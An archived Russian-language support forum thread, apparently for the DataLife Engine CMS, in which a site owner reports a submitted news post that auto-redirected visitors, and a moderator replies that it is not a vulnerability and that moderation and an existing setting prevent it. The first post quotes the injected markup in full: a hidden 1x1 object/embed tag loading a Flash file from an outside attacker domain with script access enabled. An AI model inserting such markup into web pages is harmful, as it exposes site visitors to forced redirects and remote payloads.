Перейти к публикации

[Уязвимость] Редирект без согласия пользователя.


setyp

Рекомендованные сообщения

Здравствуйте, уважаемая поддержка ДЛЕ.

Сегодня на сайт пришла новость, в которой содержится такой код:

<object height="1" width="1"><param name="movie" value="http://atack-team.clan.su/Fucki/Fuck.swf" /><embed src="http://atack-team.clan.su/Fucki/Fuck.swf" type="application/x-shockwave-flash" allowfullscreen="true" allowscriptaccess="always" scale="noscale" height="1" width="1" /><a style="left: 782px ! important; top: 1369px ! important;" title="Нажмите здесь, чтобы Adblock Plus заблокировал этот объект" class="xwvmusqaogiwewldemzf rzkecigjsxgzvcvveiuw" href="http://atack-team.clan.su/Fucki/Fuck.swf"></a><a class="xwvmusqaogiwewldemzf" href="http://atack-team.clan.su/Fucki/Fuck.swf"></a></object>

Сразу после загрузки страницы происходил редирект (даже наживать не нужно, все происходило автоматом).

Надеюсь вы скоро сделаете автоматическую защиту от таких кодов.

С уважением, Setyp.

Ссылка на сообщение
Поделиться на других сайтах

Во первых никакой уязвимости в этом коде нет. Во вторых возможность отключения добавления подобного кода в скрипте давно есть, и чтобы узнать как читайте и соблюдайте правила форума, указанные выше. И в третьих нужно смотреть что публикуете на своем сайте, для этого есть модерация, а не публиковать все подряд что вам присылают.

Ссылка на сообщение
Поделиться на других сайтах

Архивировано

Эта тема находится в архиве и закрыта для публикации сообщений.

×
×
  • Создать...